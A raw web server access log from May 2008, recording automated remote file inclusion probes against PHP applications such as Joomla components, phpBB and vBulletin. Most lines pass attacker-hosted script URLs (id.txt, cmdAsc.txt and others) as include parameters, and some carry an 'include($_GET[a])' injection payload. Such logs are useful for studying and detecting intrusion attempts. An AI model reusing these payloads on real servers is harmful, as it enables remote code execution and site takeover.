207.44.204.43 - - [29/May/2008:11:06:06 -0700] "GET /logs/access_080327.log/joomla/index.php?option=com_restaurante&task=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.71.194.211 - - [29/May/2008:11:06:08 -0700] "GET /logs/access_080205.log//appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.71.194.211 - - [29/May/2008:11:06:11 -0700] "GET //appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.71.194.211 - - [29/May/2008:11:06:15 -0700] "GET /logs//appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.231.171.70 - - [29/May/2008:11:06:29 -0700] "GET /logs//vbull/impex/ImpExData.php?systempath=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.231.171.70 - - [29/May/2008:11:06:29 -0700] "GET //vbull/impex/ImpExData.php?systempath=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.62.26.18 - - [29/May/2008:11:06:54 -0700] "GET /logs/access_071230.log/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.26.18 - - [29/May/2008:11:06:55 -0700] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.26.18 - - [29/May/2008:11:06:55 -0700] "GET /logs/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.94.129.31 - - [29/May/2008:11:07:13 -0700] "GET //admin/index.php?loadadminpage=http://pwd.roietceo.net/Newsimage/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.197.154.101 - - [29/May/2008:11:07:28 -0700] "GET /logs/access_080327.log/joomla/index.php?option=com_restaurante&task=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.241.217.240 - - [29/May/2008:11:07:42 -0700] "GET /logs/index.php?include=http://scc-team.co.cc/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.217.240 - - [29/May/2008:11:07:44 -0700] "GET /index.php?include=http://scc-team.co.cc/id.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
207.58.181.74 - - [29/May/2008:11:08:25 -0700] "GET /logs/access_080327.log/joomla/index.php?option=com_restaurante&task=http://cocreation.hk/on? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.47.204.44 - - [29/May/2008:11:08:51 -0700] "GET /logs/access.log/components/com_forum/download.php?phpbb_root_path=http://www.bestpaket.ru/netcat//dump/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.12.53.176 - - [29/May/2008:11:09:18 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1.ripway.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
195.12.53.176 - - [29/May/2008:11:09:18 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1.ripway.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
66.6.223.160 - - [29/May/2008:11:10:09 -0700] "GET /logs/access.log/components/com_forum/download.php?phpbb_root_path=http://www.bestpaket.ru/netcat//dump/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.12.53.176 - - [29/May/2008:11:10:30 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
64.13.224.83 - - [29/May/2008:11:10:38 -0700] "GET /logs//ecommerce/payment/cybersource.php?path[docroot]=http://www.science-lausd.net///upload/test.txt? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
64.13.224.83 - - [29/May/2008:11:10:39 -0700] "GET //ecommerce/payment/cybersource.php?path[docroot]=http://www.science-lausd.net///upload/test.txt? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
67.18.151.242 - - [29/May/2008:11:11:18 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.151.242 - - [29/May/2008:11:11:20 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://allblackberry.com/all/id.txt???? HTTP/1.1" 200 4139 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.151.242 - - [29/May/2008:11:11:20 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.47.201.117 - - [29/May/2008:11:11:57 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geocities.com/koeluna/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
72.47.201.117 - - [29/May/2008:11:11:57 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geocities.com/koeluna/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
200.71.194.211 - - [29/May/2008:11:12:00 -0700] "GET /logs//appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.71.194.211 - - [29/May/2008:11:12:01 -0700] "GET /logs/access_080209.log//appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.245.144.89 - - [29/May/2008:11:12:03 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://h1.ripway.com/hospenergy/robin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
77.245.144.89 - - [29/May/2008:11:12:03 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://h1.ripway.com/hospenergy/robin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
200.71.194.211 - - [29/May/2008:11:12:06 -0700] "GET //appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.71.194.211 - - [29/May/2008:11:12:32 -0700] "GET /logs/access.log//include/lib.inc.php?site_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.71.194.211 - - [29/May/2008:11:12:38 -0700] "GET //include/lib.inc.php?site_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.71.194.211 - - [29/May/2008:11:12:41 -0700] "GET /logs//include/lib.inc.php?site_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.55.113.226 - - [29/May/2008:11:12:52 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.113.226 - - [29/May/2008:11:12:54 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://allblackberry.com/all/id.txt???? HTTP/1.1" 200 4139 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.113.226 - - [29/May/2008:11:12:54 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.132.4 - - [29/May/2008:11:12:56 -0700] "GET //bbs.lib.inc.php?site_path=http://oasislingerie.ca/components/com_virtuemart/shop_image/blank.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.99.192.29 - - [29/May/2008:11:13:05 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://h1.ripway.com/hospenergy/robin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
62.99.192.29 - - [29/May/2008:11:13:05 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://h1.ripway.com/hospenergy/robin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
78.46.70.228 - - [29/May/2008:11:13:22 -0700] "GET /logs/access.log//components/com_extcalendar/admin.config.inc.php?CONFIG_EXT[FS_PATH]=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.46.70.228 - - [29/May/2008:11:13:23 -0700] "GET //components/com_extcalendar/admin.config.inc.php?CONFIG_EXT[FS_PATH]=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.46.70.228 - - [29/May/2008:11:13:23 -0700] "GET /logs//components/com_extcalendar/admin.config.inc.php?CONFIG_EXT[FS_PATH]=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.46.70.228 - - [29/May/2008:11:13:29 -0700] "GET /logs/access_071225.log//components/com_extcalendar/admin.config.inc.php?CONFIG_EXT[FS_PATH]=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.26.170 - - [29/May/2008:11:13:30 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://h1.ripway.com/hospenergy/robin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
211.189.26.170 - - [29/May/2008:11:13:30 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://h1.ripway.com/hospenergy/robin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
74.55.53.226 - - [29/May/2008:11:13:39 -0700] "GET /logs//admin_users.php?phpbb_root_path=http://www.mailboxfilter.org/rss/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.53.226 - - [29/May/2008:11:13:39 -0700] "GET //admin_users.php?phpbb_root_path=http://www.mailboxfilter.org/rss/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [29/May/2008:11:14:11 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geocities.com/cahayaindra/queen?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.241.217.240 - - [29/May/2008:11:15:22 -0700] "GET /logs/index.php?include=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.217.240 - - [29/May/2008:11:15:25 -0700] "GET /index.php?include=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
78.46.70.228 - - [29/May/2008:11:15:41 -0700] "GET //components/com_extcalendar/admin.config.inc.php?CONFIG_EXT[FS_PATH]=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.208.118.35 - - [29/May/2008:11:16:12 -0700] "GET /logs/access_080303.log/index2.php?p=http://www.comsolve.nl/radio789/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.208.118.35 - - [29/May/2008:11:16:12 -0700] "GET /index2.php?p=http://www.comsolve.nl/radio789/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.208.118.35 - - [29/May/2008:11:16:13 -0700] "GET /logs/index2.php?p=http://www.comsolve.nl/radio789/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.208.118.35 - - [29/May/2008:11:16:26 -0700] "GET /logs/access_080216.log/index2.php?p=http://www.comsolve.nl/radio789/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.55.113.226 - - [29/May/2008:11:16:30 -0700] "GET /logs//admin_users.php?phpbb_root_path=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.113.226 - - [29/May/2008:11:16:30 -0700] "GET //admin_users.php?phpbb_root_path=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.113.226 - - [29/May/2008:11:16:30 -0700] "GET /logs//admin_users.php?phpbb_root_path=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.113.226 - - [29/May/2008:11:16:30 -0700] "GET //admin_users.php?phpbb_root_path=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.113.226 - - [29/May/2008:11:16:30 -0700] "GET /logs//admin_users.php?phpbb_root_path=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.113.226 - - [29/May/2008:11:16:30 -0700] "GET //admin_users.php?phpbb_root_path=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.47.201.117 - - [29/May/2008:11:16:41 -0700] "GET /logs/help.php?css_path=http://www.geocities.com/koeluna/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
72.47.201.117 - - [29/May/2008:11:16:41 -0700] "GET /help.php?css_path=http://www.geocities.com/koeluna/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
62.128.131.80 - - [29/May/2008:11:16:57 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.128.131.80 - - [29/May/2008:11:16:59 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 200 4139 "-" "libwww-perl/5.803" "www.dmulk.com"
62.128.131.80 - - [29/May/2008:11:17:00 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.12.53.176 - - [29/May/2008:11:17:08 -0700] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://h1.ripway.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
195.12.53.176 - - [29/May/2008:11:17:08 -0700] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://h1.ripway.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
89.108.67.59 - - [29/May/2008:11:17:22 -0700] "GET /logs//popup_window.php?site_isp_root=http://h1.ripway.com/target/ndus/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.59 - - [29/May/2008:11:17:23 -0700] "GET //popup_window.php?site_isp_root=http://h1.ripway.com/target/ndus/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.66.166 - - [29/May/2008:11:17:29 -0700] "GET /logs/access_080217.log//vbull/impex/ImpExData.php?systempath=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.66.166 - - [29/May/2008:11:17:29 -0700] "GET //vbull/impex/ImpExData.php?systempath=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.66.166 - - [29/May/2008:11:17:29 -0700] "GET /logs//vbull/impex/ImpExData.php?systempath=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.243.253.159 - - [29/May/2008:11:17:30 -0700] "GET /logs/access_071227.log/index.php?sub=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.26.18 - - [29/May/2008:11:17:39 -0700] "GET /logs/access_080118.log/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.208.66.166 - - [29/May/2008:11:17:42 -0700] "GET /logs/access_080219.log//vbull/impex/ImpExData.php?systempath=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.202.82 - - [29/May/2008:11:17:50 -0700] "GET /logs//admin_users.php?phpbb_root_path=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.125.202.82 - - [29/May/2008:11:17:50 -0700] "GET //admin_users.php?phpbb_root_path=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.15.205.17 - - [29/May/2008:11:18:08 -0700] "GET /logs/access_080217.log//vbull/impex/ImpExData.php?systempath=http://eiea-sy.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.205.17 - - [29/May/2008:11:18:08 -0700] "GET //vbull/impex/ImpExData.php?systempath=http://eiea-sy.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.205.17 - - [29/May/2008:11:18:08 -0700] "GET /logs//vbull/impex/ImpExData.php?systempath=http://eiea-sy.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.205.17 - - [29/May/2008:11:18:25 -0700] "GET /logs/access_080219.log//vbull/impex/ImpExData.php?systempath=http://eiea-sy.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
88.208.118.35 - - [29/May/2008:11:18:27 -0700] "GET /logs/access_080312.log/start.php?id=http://www.comsolve.nl/radio789/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.208.118.35 - - [29/May/2008:11:18:28 -0700] "GET /start.php?id=http://www.comsolve.nl/radio789/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.208.118.35 - - [29/May/2008:11:18:28 -0700] "GET /logs/start.php?id=http://www.comsolve.nl/radio789/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.21.47 - - [29/May/2008:11:18:51 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.58.187 - - [29/May/2008:11:18:52 -0700] "GET /logs/ HTTP/1.0" 200 49542 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
88.208.118.35 - - [29/May/2008:11:18:55 -0700] "GET /logs/access_080208.log/start.php?id=http://www.comsolve.nl/radio789/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.231.171.70 - - [29/May/2008:11:19:07 -0700] "GET /components/com_forum/download.php?phpbb_root_path=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.208.118.35 - - [29/May/2008:11:19:54 -0700] "GET /logs/access_080126.log/page.php?s=http://www.comsolve.nl/radio789/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.208.118.35 - - [29/May/2008:11:19:54 -0700] "GET /page.php?s=http://www.comsolve.nl/radio789/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.208.118.35 - - [29/May/2008:11:19:55 -0700] "GET /logs/page.php?s=http://www.comsolve.nl/radio789/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.208.118.35 - - [29/May/2008:11:20:32 -0700] "GET /index2.php?p=http://www.comsolve.nl/radio789/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.58.181.74 - - [29/May/2008:11:20:34 -0700] "GET /newspublish/include.php?path[docroot]=http://tgr-clan.ch/tes? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
207.58.181.74 - - [29/May/2008:11:20:35 -0700] "GET /logs/newspublish/include.php?path[docroot]=http://tgr-clan.ch/tes? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
74.208.66.166 - - [29/May/2008:11:20:59 -0700] "GET /logs/access_071230.log/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.66.166 - - [29/May/2008:11:21:00 -0700] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.66.166 - - [29/May/2008:11:21:00 -0700] "GET /logs/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.208.118.35 - - [29/May/2008:11:21:19 -0700] "GET /start.php?id=http://www.comsolve.nl/radio789/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.59.25.3 - - [29/May/2008:11:21:25 -0700] "GET //index.php?pagina=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
88.84.132.4 - - [29/May/2008:11:21:39 -0700] "GET /logs/access.log//bbs.lib.inc.php?site_path=http://oasislingerie.ca/components/com_virtuemart/shop_image/blank.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.84.132.4 - - [29/May/2008:11:21:39 -0700] "GET /logs//bbs.lib.inc.php?site_path=http://oasislingerie.ca/components/com_virtuemart/shop_image/blank.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.128.131.80 - - [29/May/2008:11:21:39 -0700] "GET /logs/access_080118.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.128.131.80 - - [29/May/2008:11:21:40 -0700] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.128.131.80 - - [29/May/2008:11:21:40 -0700] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.205.17 - - [29/May/2008:11:22:02 -0700] "GET /logs//vbull/impex/ImpExData.php?systempath=http://eiea-sy.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.205.17 - - [29/May/2008:11:22:02 -0700] "GET //vbull/impex/ImpExData.php?systempath=http://eiea-sy.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
